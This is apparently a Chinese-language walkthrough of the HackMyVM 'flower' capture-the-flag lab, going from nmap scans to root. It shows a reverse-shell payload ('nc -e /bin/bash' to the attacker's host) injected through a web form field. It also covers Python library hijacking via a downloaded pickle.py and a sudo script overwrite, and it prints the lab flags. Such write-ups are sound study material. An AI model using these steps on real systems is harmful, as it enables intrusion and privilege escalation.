渗透学习

1.扫描网段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/home/ace/桌面]
└─# nmap -sP 192.168.56.127/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-11 12:11 CST
Nmap scan report for 192.168.56.1
Host is up (0.00029s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00063s latency).
MAC Address: 08:00:27:9A:22:84 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.143
Host is up (0.00043s latency).
MAC Address: 08:00:27:58:FE:CD (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.127
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 35.02 seconds

2.扫描相关端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(root㉿kali)-[/home/ace/桌面]
└─# nmap -sC -sV -A -p- 192.168.56.143
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-11 12:12 CST
Nmap scan report for 192.168.56.143
Host is up (0.0013s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:58:FE:CD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.30 ms 192.168.56.143

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.79 seconds

3.访问网页

image-20230811121615838

端口扫描也只有这一个位置,那么可能涉及到burp suite

image-20230811122303482

可以修改flower的value来实现反弹shell

base64编码

1
system("nc -e /bin/bash 192.168.56.127 4444")

image-20230811122837851

image-202308111228585004.用户切换

1
2
3
4
5
6
7
import pickle

diary = {"November28":"i found a blue viola","December1":"i lost my blue viola"}
p = open('diary.pickle','wb')
pickle.dump(diary,p)
www-data@flower:/home/rose/diary$

发现了这个,导入了pickle

python库劫取

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
www-data@flower:/home/rose/diary$ wget http://192.168.56.127:8000/pickle.py
wget http://192.168.56.127:8000/pickle.py
--2023-08-11 00:41:10--  http://192.168.56.127:8000/pickle.py
Connecting to 192.168.56.127:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33 [text/x-python]
Saving to: ‘pickle.py’

pickle.py           100%[===================>]      33  --.-KB/s    in 0s      

2023-08-11 00:41:10 (9.32 MB/s) - ‘pickle.py’ saved [33/33]

www-data@flower:/home/rose/diary$ ls
ls
diary.py  pickle.py
www-data@flower:/home/rose/diary$ sudo -l
sudo -l
Matching Defaults entries for www-data on flower:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on flower:
    (rose) NOPASSWD: /usr/bin/python3 /home/rose/diary/diary.py
www-data@flower:/home/rose/diary$ sudo -u rose /usr/bin/python3 /home/rose/diary/diary.py
< -u rose /usr/bin/python3 /home/rose/diary/diary.py
rose@flower:~/diary$

first flag:

1
2
3
4
5
6
rose@flower:~/diary$ cd ..
cd ..
rose@flower:~$ cat user.txt
cat user.txt
HMV{R0ses_are_R3d$}
rose@flower:~$

5.root

1
2
3
4
5
6
rose@flower:~$ /bin/bash /home/rose/.plantbook
/bin/bash /home/rose/.plantbook
Hello, write the name of the flower that u found
rose
rose
Nice, rose submitted on : Fri Aug 11 00:44:41 EDT 2023

这段说明有调用时间命令

可以试试直接覆写.plantbook

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
rose@flower:~$ echo "/bin/bash" >.plantbook
echo "/bin/bash" >.plantbook
rose@flower:~$ ls
ls
diary  user.txt
rose@flower:~$ ls -al
ls -al
total 32
drwxrwxr-x 3 rose rose 4096 Aug 11 00:49 .
drwxr-xr-x 3 root root 4096 Nov 30  2020 ..
-rw-r--r-- 1 rose rose  220 Nov 30  2020 .bash_logout
-rw-r--r-- 1 rose rose 3526 Nov 30  2020 .bashrc
-rw-r--r-- 1 rose rose   10 Aug 11 00:49 .plantbook
-rw-r--r-- 1 rose rose  807 Nov 30  2020 .profile
drwxrwxrwx 3 rose rose 4096 Aug 11 00:41 diary
-rw------- 1 rose rose   20 Nov 30  2020 user.txt
rose@flower:~$ /bin/bash /home/rose/.plantbook
/bin/bash /home/rose/.plantbook
rose@flower:~$ ls
ls
diary  user.txt
rose@flower:~$ id
id
uid=1000(rose) gid=1000(rose) groups=1000(rose),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
rose@flower:~$ sudo /bin/bash /home/rose/.plantbook
sudo /bin/bash /home/rose/.plantbook
root@flower:/home/rose# ls
ls
diary  user.txt
root@flower:/home/rose# cat .root/root.txt
1
2
3
4
5
root@flower:/home/rose# cat /root/root.txt
cat /root/root.txt
HMV{R0ses_are_als0_black.}
root@flower:/home/rose#